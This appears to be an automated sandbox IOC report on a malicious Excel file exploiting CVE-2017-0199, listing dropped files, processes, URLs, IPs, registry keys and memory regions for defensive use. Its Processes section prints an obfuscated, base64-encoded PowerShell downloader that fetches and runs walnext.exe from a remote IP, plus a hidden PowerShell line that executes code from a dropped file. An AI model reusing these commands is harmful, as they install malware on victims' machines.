IOC Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 04:37:38 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\walnext[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf
ASCII text, with very long lines (4175), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\wlanext.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\wlanext.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\Desktop\~$SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
data
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B39DCB1F.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\0fm0vfl2.3ju.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES6549.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Oct 28 10:21:37 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\dkbbhokt.ygr.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\eutt3eyl.a0a.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\fmhhpwdc.f0i.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\l51134rf.bdn.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
dropped
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\yj2q5n4t.xgg.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF75AC2D79D8A2DD86.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFB828E4A960AEC6B0.TMP
data
dropped
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Drtrsklers.gje
data
dropped
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Netvrkslsninger.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\Revisionistiskes.int
data
dropped
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\fortje.kur
data
dropped
C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Zigzaggy.aci
data
dropped
C:\Users\user\Desktop\C0230000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 10:21:43 2024, Security: 1
dropped
C:\Users\user\Desktop\C0230000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Oct 28 10:21:43 2024, Security: 1
dropped
There are 22 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline"
malicious
C:\Users\user\AppData\Roaming\wlanext.exe
"C:\Users\user\AppData\Roaming\wlanext.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6549.tmp" "c:\Users\user\AppData\Local\Temp\muz5o0kx\CSCE919D41A8D904501847FAAE39BA08A1.TMP"

URLs

Name
IP
Malicious
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta
107.175.113.214
malicious
http://107.175.113.214/902/walnext.exe
107.175.113.214
malicious
https://qrisni.me/
unknown
http://nuget.org/NuGet.exe
unknown
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta&fric3
unknown
https://qrisni.me/L
unknown
https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&friction=reminiscent&stumbling=needless&vertigo
188.114.96.3
http://107.175.113.214/902/walne
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.binr
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://107.175.113.214/
unknown
http://107.175.113.214/902/walnext.exed-
unknown
http://go.micros
unknown
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htahttp://1
unknown
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.htapt-C:
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://nsis.sf.net/NSIS_Error
unknown
http://107.175.113.214/902/walnext.exep
unknown
http://107.175.113.214/xampp/rdh/niceworkingthingswithgreatthingsevengetbackwithgoodnews.hta...ictio
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://107.175.113.214/902/walnext.exe9
unknown
https://qrisni.me/L44VBp?&waterspout=toothsome&washbasin=berserk&beer=unable&attorney=magical&fricti
unknown
http://ocsp.entrust.net0D
unknown
https://www.bookinginfo.asia/9
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://www.bookinginfo.asia/
unknown
https://www.bookinginfo.asia/pkeZmGiUuTK20.bin
199.217.106.226
http://crl.entrust.net/2048ca.crl0
unknown
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
qrisni.me
188.114.96.3
bookinginfo.asia
199.217.106.226
www.bookinginfo.asia
unknown

IPs

IP
Domain
Country
Malicious
107.175.113.214
unknown
United States
malicious
188.114.96.3
qrisni.me
European Union
199.217.106.226
bookinginfo.asia
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
o5/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28575
28575
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
7 /
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\321C3
321C3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\325C9
325C9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\dissentieringernes\Bilassistenters
soyuz
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 39 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2445F000
stack
page read and write
640000
heap
page read and write
2977000
trusted library allocation
page read and write
21651000
trusted library allocation
page read and write
194000
heap
page read and write
6730000
trusted library allocation
page read and write
215BD000
trusted library allocation
page read and write
5F60000
heap
page read and write
1BE4F000
stack
page read and write
2ABA000
trusted library allocation
page read and write
4D17000
heap
page read and write
215B0000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
2224000
remote allocation
page execute and read and write
65D0000
heap
page read and write
4CDD000
heap
page read and write
48C0000
heap
page read and write
2C5B000
trusted library allocation
page read and write
373B000
heap
page read and write
1C159000
heap
page read and write
21710000
trusted library allocation
page read and write
21D5F000
stack
page read and write
147000
heap
page read and write
43E000
unkown
page read and write
37B3000
heap
page read and write
215B0000
trusted library allocation
page read and write
1AF90000
heap
page read and write
413F000
stack
page read and write
21700000
trusted library allocation
page execute and read and write
4CEE000
heap
page read and write
2AAF000
trusted library allocation
page read and write
37B7000
heap
page read and write
4CC1000
heap
page read and write
1CE0000
direct allocation
page read and write
32C0000
heap
page read and write
36F3000
heap
page read and write
215B0000
trusted library allocation
page read and write
37BC000
heap
page read and write
440000
heap
page read and write
4CDB000
heap
page read and write
38D5000
trusted library allocation
page read and write
2AB3000
trusted library allocation
page read and write
4AB9000
heap
page read and write
1BF1E000
stack
page read and write
38C9000
trusted library allocation
page read and write
3CA0000
trusted library allocation
page read and write
18F000
heap
page read and write
217B0000
trusted library allocation
page read and write
2ABB000
trusted library allocation
page read and write
D0000
heap
page read and write
2982000
trusted library allocation
page read and write
3F6F000
stack
page read and write
4D2D000
heap
page read and write
24550000
heap
page execute and read and write
371C000
heap
page read and write
360E000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
5F66000
heap
page read and write
56B000
heap
page read and write
1C1000
heap
page read and write
18F000
heap
page read and write
216A0000
heap
page read and write
2BCF000
stack
page read and write
216F0000
trusted library allocation
page read and write
4D3D000
heap
page read and write
360000
heap
page read and write
215B0000
trusted library allocation
page read and write
2AB2000
trusted library allocation
page read and write
38D5000
trusted library allocation
page read and write
297F000
trusted library allocation
page read and write
18B000
stack
page read and write
1C0FD000
heap
page read and write
1C05C000
stack
page read and write
1A0000
direct allocation
page read and write
4AC0000
heap
page read and write
21820000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
38D5000
trusted library allocation
page read and write
371E000
heap
page read and write
1CA0000
direct allocation
page read and write
605E000
stack
page read and write
1BE0000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
21652000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
18F000
heap
page read and write
360E000
trusted library allocation
page read and write
21700000
trusted library allocation
page read and write
21A3D000
stack
page read and write
215B0000
trusted library allocation
page read and write
4AB7000
heap
page read and write
2ABA000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
210000
direct allocation
page read and write
3731000
heap
page read and write
248000
stack
page read and write
21700000
trusted library allocation
page read and write
1AA9C000
stack
page read and write
2979000
trusted library allocation
page read and write
33E0000
direct allocation
page read and write
3C60000
trusted library allocation
page read and write
190000
heap
page read and write
38E0000
trusted library allocation
page read and write
10000
heap
page read and write
315000
heap
page read and write
2C5B000
trusted library allocation
page read and write
2975000
trusted library allocation
page read and write
20000
heap
page read and write
21700000
trusted library allocation
page read and write
4AC1000
heap
page read and write
14E000
heap
page read and write
4D21000
heap
page read and write
6520000
heap
page execute and read and write
7FE89A64000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page read and write
54F000
heap
page read and write
4ABB000
heap
page read and write
327C000
trusted library allocation
page read and write
28B000
trusted library allocation
page execute and read and write
7FE89B70000
trusted library allocation
page read and write
349000
heap
page read and write
1C38C000
stack
page read and write
119000
heap
page read and write
215B0000
trusted library allocation
page read and write
2186E000
stack
page read and write
2260000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
138000
heap
page read and write
21650000
trusted library allocation
page read and write
42C000
unkown
page read and write
220FE000
trusted library allocation
page read and write
586000
heap
page read and write
38D5000
trusted library allocation
page read and write
194000
heap
page read and write
3C0000
heap
page read and write
2423D000
stack
page read and write
1C0000
heap
page read and write
21650000
trusted library allocation
page read and write
147000
heap
page read and write
6720000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
4D35000
heap
page read and write
34C0000
trusted library allocation
page read and write
40A000
unkown
page read and write
4D37000
heap
page read and write
630000
heap
page read and write
4ABC000
heap
page read and write
79000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
4A24000
remote allocation
page execute and read and write
312000
heap
page read and write
38D0000
trusted library allocation
page read and write
2169E000
stack
page read and write
1CA0000
trusted library allocation
page read and write
272000
trusted library allocation
page read and write
7FE89890000
trusted library allocation
page read and write
376C000
heap
page read and write
4A0B000
heap
page read and write
3640000
heap
page read and write
2960000
remote allocation
page read and write
870000
heap
page read and write
4D21000
heap
page read and write
270000
trusted library allocation
page read and write
2176E000
trusted library allocation
page read and write
61ED000
heap
page read and write
4CD6000
heap
page read and write
1E0000
direct allocation
page read and write
1710000
remote allocation
page execute and read and write
1C00000
trusted library allocation
page read and write
21651000
trusted library allocation
page read and write
2FA000
heap
page read and write
49DC000
heap
page read and write
21D0E000
stack
page read and write
2AAE000
trusted library allocation
page read and write
4B13000
heap
page read and write
360E000
trusted library allocation
page read and write
1C8BA000
stack
page read and write
400000
unkown
page readonly
21650000
trusted library allocation
page read and write
36D5000
heap
page read and write
2C5B000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
1C0DE000
stack
page read and write
44D000
heap
page read and write
21650000
trusted library allocation
page read and write
4A03000
heap
page read and write
190000
direct allocation
page read and write
2C24000
remote allocation
page execute and read and write
7FFFFF00000
trusted library allocation
page execute and read and write
3C60000
trusted library allocation
page read and write
2194E000
stack
page read and write
60F7000
heap
page read and write
368000
heap
page read and write
36C0000
heap
page read and write
1C84000
heap
page read and write
225F000
stack
page read and write
562000
heap
page read and write
147000
heap
page read and write
1CE3000
direct allocation
page read and write
401000
unkown
page execute read
7FE89936000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
2680000
heap
page read and write
1FB0000
heap
page read and write
F3000
heap
page read and write
4B12000
heap
page read and write
21C5E000
stack
page read and write
4B10000
heap
page read and write
664F000
heap
page read and write
3400000
direct allocation
page read and write
6C0000
heap
page read and write
362E000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
586000
heap
page read and write
4900000
heap
page read and write
362E000
trusted library allocation
page read and write
4CD1000
heap
page read and write
21810000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
3C5E000
stack
page read and write
376A000
heap
page read and write
2ABE000
trusted library allocation
page read and write
220C000
trusted library allocation
page read and write
3CE5000
heap
page read and write
280000
heap
page read and write
1C0E9000
heap
page read and write
38D0000
trusted library allocation
page read and write
3460000
direct allocation
page read and write
1C3A0000
heap
page read and write
1A71C000
stack
page read and write
70000
trusted library allocation
page read and write
1AF6000
heap
page read and write
1B0DF000
stack
page read and write
30C000
heap
page read and write
4CD6000
heap
page read and write
220000
direct allocation
page read and write
21760000
trusted library allocation
page read and write
39D000
heap
page read and write
4ABF000
heap
page read and write
8FD000
heap
page read and write
215B0000
trusted library allocation
page read and write
4ABC000
heap
page read and write
3050000
trusted library allocation
page read and write
37BB000
heap
page read and write
2AB7000
trusted library allocation
page read and write
1B2B0000
heap
page read and write
2C5B000
trusted library allocation
page read and write
2200C000
stack
page read and write
1B6000
heap
page read and write
4B14000
heap
page read and write
194000
heap
page read and write
362E000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
4CDD000
heap
page read and write
37B7000
heap
page read and write
6510000
remote allocation
page read and write
142000
heap
page read and write
4CCA000
heap
page read and write
2A9E000
stack
page read and write
6710000
trusted library allocation
page execute and read and write
24A00000
heap
page read and write
2684000
heap
page read and write
2C5B000
trusted library allocation
page read and write
84000
trusted library allocation
page read and write
240000
direct allocation
page read and write
6654000
heap
page read and write
4901000
heap
page read and write
7FE89883000
trusted library allocation
page execute and read and write
1A5C9000
heap
page read and write
5F50000
heap
page read and write
287000
trusted library allocation
page execute and read and write
3A1E000
stack
page read and write
215B0000
trusted library allocation
page read and write
4D1F000
heap
page read and write
1824000
remote allocation
page execute and read and write
38D5000
trusted library allocation
page read and write
27A000
trusted library allocation
page execute and read and write
1CFD000
direct allocation
page read and write
4AAE000
heap
page read and write
215B1000
trusted library allocation
page read and write
122000
heap
page read and write
21640000
trusted library allocation
page read and write
38F000
heap
page read and write
36F3000
heap
page read and write
362E000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
3763000
heap
page read and write
360E000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
21800000
trusted library allocation
page read and write
89000
stack
page read and write
4D35000
heap
page read and write
892000
heap
page read and write
3E6A000
stack
page read and write
27B5000
heap
page read and write
6631000
heap
page read and write
376B000
heap
page read and write
37BB000
heap
page read and write
21650000
trusted library allocation
page read and write
4B22000
heap
page read and write
440000
unkown
page readonly
586000
heap
page read and write
1C80000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
329000
heap
page read and write
3467000
direct allocation
page read and write
2C5B000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
324000
heap
page read and write
1CE000
heap
page read and write
362E000
trusted library allocation
page read and write
7FE89AC0000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
1C7AE000
stack
page read and write
38C9000
trusted library allocation
page read and write
2AAA000
trusted library allocation
page read and write
5FA0000
heap
page read and write
2ABD000
trusted library allocation
page read and write
440000
unkown
page readonly
8D000
trusted library allocation
page execute and read and write
2971000
trusted library allocation
page read and write
636000
heap
page read and write
21F80000
heap
page read and write
3473000
direct allocation
page read and write
360E000
trusted library allocation
page read and write
4AB7000
heap
page read and write
362E000
trusted library allocation
page read and write
400000
unkown
page readonly
374D000
heap
page read and write
4D37000
heap
page read and write
7FE89A80000
trusted library allocation
page read and write
276000
trusted library allocation
page execute and read and write
21760000
trusted library allocation
page read and write
1A22C000
stack
page read and write
410000
heap
page read and write
360E000
trusted library allocation
page read and write
4B22000
heap
page read and write
4AB7000
heap
page read and write
297D000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
4AAE000
heap
page read and write
215B0000
trusted library allocation
page read and write
1A64D000
heap
page read and write
4AB9000
heap
page read and write
3CE0000
heap
page read and write
2AAA000
trusted library allocation
page read and write
12001000
trusted library allocation
page read and write
190000
heap
page read and write
38D5000
trusted library allocation
page read and write
874000
heap
page read and write
4D3D000
heap
page read and write
297D000
trusted library allocation
page read and write
530000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
196000
heap
page read and write
4CFA000
heap
page read and write
80000
trusted library allocation
page read and write
4A88000
heap
page read and write
4B1B000
heap
page read and write
2973000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
612A000
heap
page read and write
215B0000
trusted library allocation
page read and write
24137000
heap
page read and write
1FB4000
heap
page read and write
21760000
trusted library allocation
page read and write
2453E000
stack
page read and write
2AB6000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
5F40000
heap
page read and write
194000
heap
page read and write
1CE000
heap
page read and write
362E000
trusted library allocation
page read and write
2ABA000
trusted library allocation
page read and write
36D6000
heap
page read and write
360E000
trusted library allocation
page read and write
4D37000
heap
page read and write
36CF000
heap
page read and write
4D21000
heap
page read and write
1C0000
heap
page read and write
401000
unkown
page execute read
215B0000
trusted library allocation
page read and write
21AB0000
heap
page execute and read and write
21650000
trusted library allocation
page read and write
3769000
heap
page read and write
2982000
trusted library allocation
page read and write
2AAA000
trusted library allocation
page read and write
1C54B000
stack
page read and write
21646000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
21710000
trusted library allocation
page read and write
7FE89A33000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
7FE89966000
trusted library allocation
page execute and read and write
4A3A000
heap
page read and write
3280000
trusted library allocation
page read and write
6130000
heap
page read and write
371E000
heap
page read and write
360E000
trusted library allocation
page read and write
2AAE000
trusted library allocation
page read and write
21710000
trusted library allocation
page read and write
1A648000
heap
page read and write
4B06000
heap
page read and write
21650000
trusted library allocation
page read and write
371E000
heap
page read and write
297D000
trusted library allocation
page read and write
1E38000
stack
page read and write
360E000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
24157000
heap
page read and write
4CDC000
heap
page read and write
27EB000
heap
page read and write
